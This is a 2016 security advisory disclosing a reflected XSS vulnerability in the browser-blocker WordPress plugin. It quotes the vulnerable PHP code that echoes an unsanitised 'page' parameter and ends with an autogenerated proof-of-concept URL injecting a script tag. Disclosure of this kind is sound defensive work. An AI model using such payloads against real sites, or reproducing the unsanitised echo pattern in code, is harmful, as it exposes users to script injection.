Advisory #: 328
Title: Reflected XSS in wordpress plugin browser-blocker v0.5.6
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/browser-blocker
Downloads: 8573
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: browser-blocker
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./browser-blocker/browser_blocker.php: 591: <a href="?page=<?php echo $_GET["page"] ?>&whichP=simple"><div id="bb_simple" class="tab <?php if(!isset($_GET["whichP"]) || $_GET["whichP"] == "simple"){ echo "open"; }else{ echo "closed"; } ?>" >Simple Options</div></a><a href="?page=<?php echo $_GET["page"] ?>&whichP=advanced"><div id="bb_advanced" class="tab <?php if(isset($_GET["whichP"]) && $_GET["whichP"] == "advanced"){ echo "open"; }else{ echo "closed"; } ?>" >Advanced Options</div></a><div style="clear:both"></div> The variable page appears to send unsanitized data back to the users browser.
CVE-ID: Not Released
File:./browser-blocker/browser_blocker.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. http://[target]/wp-content/plugins/browser-blocker/browser_blocker.php?page="><script>alert(1);</script><"